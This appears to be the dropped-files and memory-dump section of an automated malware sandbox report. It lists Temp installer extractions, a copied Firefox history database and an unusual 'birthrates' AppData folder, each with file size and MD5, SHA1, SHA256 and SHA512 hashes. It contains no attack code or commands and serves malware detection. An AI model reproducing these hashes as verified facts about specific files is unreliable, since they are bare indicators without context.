6677f65a0e26fdc2cff6cef0231f5e5f0713ee7c5cf7f488599a3c7ac3e8365afaec10b35d6145ea58d364151d8bcb08308765693a9797ea99b894d6e8224ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\vk_swiftshader.dll

Filesize
4.9MB

MD5
0e653627e1754dfb69680077af7bc0e1

SHA1
45a46f604d5da8920c2485e4931feb4f84ae294c

SHA256
b279cb96e6e853624079b87f6f5d9321c8662aeb06631bb9261db5a73496a55c

SHA512
0c71bdfde59a47c435c98311714a9417a5be5356fb8845cd8b755357eed6bf4d70124c495303d2f2a4e8d0a964af2c4579b8d6715f6ee4915aaf47163ec20b28

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\vk_swiftshader_icd.json

Filesize
106B

MD5
8642dd3a87e2de6e991fae08458e302b

SHA1
9c06735c31cec00600fd763a92f8112d085bd12a

SHA256
32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

SHA512
f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\vulkan-1.dll

Filesize
931KB

MD5
66f1223b63719717e59ce7059f2cfba8

SHA1
80cfccccac4d55d0b1916ac2fe744c61e6baae0e

SHA256
96d48cbc783aa0aa283398f3bfdc3d997ad328265f1af2cfd781ba89829601b4

SHA512
9a3e08ea3c91f67ca16a9ac17f6257a6035873e34ab341d8103c3da0b3a659f5d95f3522f87065bde5c4be2373dabc229b1bd8a194574753c85b1d8a9d6ac114

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ue3bcu6m.default-release\places.sqlite_tmp

Filesize
5.0MB

MD5
9c34915861c2e79553978e4e7dbc9362

SHA1
35ee86260b81a873393d14917587e853f9b166cf

SHA256
c20169b50d6c1614926522e70e3f1c2425c63b20df9767012c611c9de5cf4907

SHA512
5a3da721dcbb62d0191967d65c41e24162c7b36bdc04e518d585c570e8d2053a91eb1a5eff21ccb6cf79fb096d6625ccd986863235bb772c9a83b275002295b7

Download Submit
C:\Users\Admin\AppData\Roaming\birthrates\Network\Network Persistent State

Filesize
300B

MD5
394b1d2decb8feb3cf7f2ee7624ec6c4

SHA1
0a9a7409a8b11cb2a230f8a82446274808709a15

SHA256
53194466d79077c3147a69a01bb5796010e4eed097f2b9d69cf1b8603c9f028e

SHA512
e1bf2ccfe9aa1dd9af473f2448258c657af499df192f216052643ddc9f45f8718d85776b22744ab0246c7c06dca8a085bc0ca3550a21f367e97eb5dbd027308b

Download Submit
C:\Users\Admin\AppData\Roaming\birthrates\Network\TransportSecurity

Filesize
188B

MD5
b57408830a644616d91842deb9834008

SHA1
18b811990172982851c632c72b452c2edf341bee

SHA256
c5e8ba5cd5601dfaaee891297edd916c2ffabed33cc6d3ce09df7ea81ceb4e6e

SHA512
263e25b43ac4c543d2023882229f81805d100e9c349a19d1490edba3dddea906da9278d00cad8edf8bfe19b2daed9ac77c22fcc33bb9f6808f0212c13f24fdb3

Download Submit
C:\Users\Admin\AppData\Roaming\birthrates\efce4867-c269-4b3d-9c8e-d3920bb28587.tmp

Filesize
57B

MD5
58127c59cb9e1da127904c341d15372b

SHA1
62445484661d8036ce9788baeaba31d204e9a5fc

SHA256
be4b8924ab38e8acf350e6e3b9f1f63a1a94952d8002759acd6946c4d5d0b5de

SHA512
8d1815b277a93ad590ff79b6f52c576cf920c38c4353c24193f707d66884c942f39ff3989530055d2fade540ade243b41b6eb03cd0cc361c3b5d514cca28b50a

Download Submit
memory/1244-3629-0x000001E0FB970000-0x000001E0FB980000-memory.dmp

Filesize
64KB

Download
memory/1244-3632-0x000001E0FB9A0000-0x000001E0FB9B0000-memory.dmp

Filesize
64KB

Download
memory/1244-3656-0x000001E0FC5E0000-0x000001E0FC5E1000-memory.dmp

Filesize
4KB

Download
memory/1244-3643-0x000001E0FC540000-0x000001E0FC541000-memory.dmp

Filesize
4KB

Download
memory/1244-3655-0x000001E0FC5E0000-0x000001E0FC5E1000-memory.dmp

Filesize
4KB

Download
memory/1244-3644-0x000001E0FC5D0000-0x000001E0FC5D1000-memory.dmp

Filesize
4KB

Download
memory/1244-3645-0x000001E0FC5D0000-0x000001E0FC5D1000-memory.dmp

Filesize
4KB

Download
memory/1244-3641-0x000001E0FC540000-0x000001E0FC541000-memory.dmp

Filesize
4KB

Download
memory/1244-3639-0x000001E0FC4C0000-0x000001E0FC4C1000-memory.dmp

Filesize
4KB

Download
memory/2776-1958-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1964-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1966-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1967-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1968-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1970-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1969-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1959-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1960-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/2776-1965-0x000001DADD710000-0x000001DADD711000-memory.dmp

Filesize
4KB

Download
memory/5996-883-0x0000026D2F8C0000-0x0000026D2F8E2000-memory.dmp

Filesize
136KB

Download